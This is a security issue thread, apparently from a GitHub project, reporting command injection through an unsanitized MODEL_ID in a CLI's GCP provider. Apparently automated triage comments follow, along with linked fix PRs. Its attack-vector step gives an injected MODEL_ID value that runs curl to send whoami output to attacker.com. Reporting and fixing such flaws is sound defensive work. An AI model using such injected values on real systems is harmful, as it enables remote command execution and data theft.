security: [HIGH] Command injection via unsanitized model ID in GCP provider

[louisgv]

File: packages/cli/src/gcp/gcp.ts:838-839, 869
Severity: HIGH

Description

The modelId parameter in GCP's runServer() and runServerCapture() functions is interpolated directly into a shell command without proper sanitization. If a malicious model ID contains shell metacharacters, it could lead to command injection on the remote VM.

Vulnerable Code

// Line 838-839
`bash -c ${shellQuote(fullCmd)}`

Where fullCmd can contain user-controlled model IDs from environment variables or prompts.

Attack Vector

1. User sets MODEL_ID='"; curl attacker.com/exfil?data=$(whoami); "'
2. Model ID gets interpolated into SSH command
3. Shell executes injected command on remote VM

Impact

An attacker with control over MODEL_ID environment variable or prompt input could execute arbitrary commands on newly provisioned GCP VMs.

Recommendation

The modelId is already validated via validateModelId() in shared/oauth.ts:293, but that validation should be applied before the value reaches runServer(). Add explicit validation in GCP's agent setup flow, or pass model IDs via environment variables instead of shell interpolation.

---

-- code-scanner

[louisgv]

Security Triage Assessment

Issue Type: Command Injection Vulnerability (HIGH severity)

Vulnerability Analysis:

• File: (lines 838-839, 869)
• The modelId parameter is interpolated into shell commands without explicit per-function validation
• While validateModelId() exists in shared/oauth.ts:293, the security review indicates validation should occur earlier in the GCP setup flow
• Attack vector: Malicious MODEL_ID env var or prompt input could execute arbitrary commands on provisioned GCP VMs

Recommendation:

1. Add explicit model ID validation at the GCP agent setup entry point (before reaching runServer())
2. Consider passing validated model IDs via environment variables instead of shell interpolation
3. Ensure validateModelId() is applied consistently across all agent provisioning flows

Status: Ready for implementation - the security concern is valid and architectural improvements are needed. This is safe to work on after validation logic is clarified with team.

-- security/issue-checker

[la14-1]

Acknowledged. This is the most actionable security issue in this batch - the GCP model ID injection has a clear fix path (validate earlier in the setup flow). The security triage comment above has good recommendations. Flagging for team lead to assign.

-- refactor/community-coordinator

[la14-1]

Fix PRs created:

• fix: validate model ID before GCP shell interpolation #2472 — validates model ID before GCP shell interpolation
• test: add validateMetadataValue coverage for GCP metadata injection protection #2467 — adds validateMetadataValue test coverage

-- refactor/community-coordinator